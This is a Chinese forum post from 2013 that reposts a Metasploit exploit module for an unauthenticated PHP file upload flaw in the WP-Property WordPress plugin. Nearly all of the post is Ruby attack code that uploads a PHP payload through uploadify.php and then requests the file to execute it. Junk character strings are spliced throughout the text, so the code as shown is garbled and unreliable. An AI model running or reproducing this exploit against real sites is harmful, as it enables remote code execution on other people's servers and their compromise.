WordPress WP-Property PHP 文件上传漏洞
# f7 e% e9 [: u2 G' U/ \: {/ L
8 B( f6 D4 S( h ## # This file is part of the Metasploit Framework and may be subject to
* z& N, }7 L( @9 t4 u) {
4 Z+ T, T, ~$ X: x# redistribution and commercial restrictions. Please see the Metasploit) K- o8 X" z; ^/ x; L0 a$ i
0 j) q+ K9 p- e5 X/ [# Framework web site for more information on licensing and terms of use.
2 X0 }; O! O0 }- {7 X0 |1 a) U) l) g8 F5 |, E4 y6 Z4 I
# http://metasploit.com/framework/ ##8 {( ]1 |5 Z' U3 ^- q z, j
6 h- e3 ?1 h$ W2 H0 V4 q
( R& ~0 j% p5 q. b
6 _" `4 v1 Y$ ~2 ^. Q. v y 2 X8 l- r; C+ c+ P$ m
, R& _1 F% K: v7 l5 F4 c, V
require 'msf/core'3 C2 h- q( P d1 v$ J
require 'msf/core/exploit/php_exe'
4 Y: N& W8 m* s9 g. I1 Z3 k, d8 T" n/ w7 f) h9 f% j
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
# j# p1 l5 l3 p) a; |' L7 t4 B, N'Description' => %q{, \: \$ w' K- p
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
, c8 R# _+ m1 N3 z4 @; a, J[: i; g. Y, a/ S j% D
'Sammy FORGIT', # initial discovery
, `/ Y. A4 w/ E X5 i% o9 |'James Fitts <fitts.james[at]gmail.com>' # metasploit module% K9 H! z D" _7 q! ], @7 U
],
; j6 O: u- q4 n; d) t4 K" k'License' => MSF_LICENSE,; L3 r3 {' {7 |
'References' =>
% @1 b. Q2 ^6 |8 J. G. V# u ?[
6 [; g! ~& ~. K[ 'OSVDB', '82656' ],, A/ f4 ?5 u6 u3 b/ f1 K- O _
[ 'BID', '53787' ],* y& K$ X6 O9 Z$ }9 C% F4 V3 Y
[ 'EDB', '18987'],
6 I, H6 ^! _. A5 J0 M' N[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]' T2 l E( q! B9 F1 W
]," q1 h4 e- |4 y E* }1 B9 \8 Z
'Payload' =>$ g+ T% m: @& O
{% a* z7 O- R* U8 F
'BadChars' => "\x00",
" I: K q) f. i: F! x) K2 Z) w8 D! m},
L) A& {; R) d6 O'Platform' => 'php',
1 w6 B) P" m( U& C" F- C'Arch' => ARCH_PHP,; w, ^: j; L O* `
'Targets' =>
$ k) J9 A z, I" X0 q[
' |* l& x( C9 _, W" Y! V[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],6 k: j b! q3 f1 b5 z8 Z. P
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]. C k7 M! V, l: e2 A A8 F
],/ ~+ d/ ?8 v* A
'DefaultTarget' => 0,
, X5 B8 {' S( v) H/ c5 c- P+ _/ j'DisclosureDate' => 'Mar 26 2012'))
" ^+ k: C6 j6 O& W& ^ q- _2 b/ H! J8 W- z. c3 N5 N
register_options(
- e" |5 Y$ z0 ~! ~( R' l0 _[. i5 P9 B4 u) f* h3 S
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 M8 |# F% \, E
], self.class)
& [' S( J4 @* X7 Gend
0 ~+ E$ g& y8 Q. _ f
8 F/ m3 P7 D, `) U7 w" g0 z- Ydef check
0 K; c) g" T- H3 ?7 c$ }& [uri = target_uri.path
5 ^5 d, D8 J; Y" d6 l7 Wuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', _" i, l% | e8 V7 t( T7 g5 y
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"" H& F! g" Y& s; p. G( D
})
2 }" S0 E( m* o6 v' J; J# c4 A, L- l' X0 S! R W1 k! T- R
if not res or res.code != 200$ r, Y$ y3 W+ r. o0 P# S0 w
return Exploit::CheckCode::Unknown
' W% A5 q% c& G9 i s" E% ]end( Y0 h5 ?: S8 N, n
+ Q- J' P2 D O! w/ Qreturn Exploit::CheckCode::Appears5 ?; N$ c* E. G7 n1 H
end
) Q# z ^* u4 J! R6 y0 g- V, l
% E- L3 Z9 A, u$ G3 u0 {def exploit
6 Y p( N0 f! s4 ^# B9 ?uri = target_uri.path
3 _! _* |+ \# N* r/ J5 Kuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)( r& w4 u# X# @- d+ |: H
" U1 ^2 d1 Z' L4 O4 a, O
data = Rex::MIME::Message.new
! t9 [0 [8 x/ \4 R4 bdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
; P* k8 }9 C1 k& odata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\""); M/ E- N& \, d, D9 O* E% g& d9 ?, U- u
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')3 `- T2 N7 R4 K/ O0 M
1 j0 s% n! Y, _( Q: I' N7 vprint_status("#{peer} - Uploading payload #{@payload_name}")
; `) D6 Y8 _: c. |( M- e4 H" jres = send_request_cgi({- {, E: x2 y8 ?& Q2 e( c, @
'method' => 'POST',1 Y- T3 Y' {/ Y* d& C# J
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
3 M0 f. v5 l3 H6 @7 Z0 C4 f/ s'ctype' => "multipart/form-data; boundary=#{data.bound}",
6 p* D# G& p) @3 M; u'data' => post_data% m% w/ x& C- u2 u' y Z* b0 y* |2 z9 L
})$ f( g9 T/ A& i4 `
9 s, h8 W& {/ T6 M' h: Z( r
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
0 ~8 b5 ~, z' _ Ufail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed"): m2 T3 I8 q8 I5 S0 J
end
5 k; l' ~0 Q& }! i$ W
% Y- ?* A) i( t7 H q$ oupload_uri = res.body
' Y) K4 w- C7 X, t, w. K, @0 C
5 [- e6 ?9 X( k. Z' [; I$ r' xprint_status("#{peer} - Executing payload #{@payload_name}")+ |# o6 A% v; b) k8 g
res = send_request_raw({7 `& s" J) ?7 Y5 j
'uri' => upload_uri,1 ?7 Y" \" @. q8 [' J: y0 s% e) m
'method' => 'GET'& d) U9 O' v4 U
})
" s! }' D; N, i+ I Y1 J7 {- fend
, }8 v1 `& ~9 d. z# Nend6 e6 ?& i, x7 c& e! m
( ^, q% E0 j- z2 r1 Q
不要问我这写的是什么 怎么利用 我是说msf.
6 M4 E* k+ c G' s
9 J! }* t4 P$ i9 Q. | |
发表于 2013-1-4 19:51:30
收藏
分享
支持
反对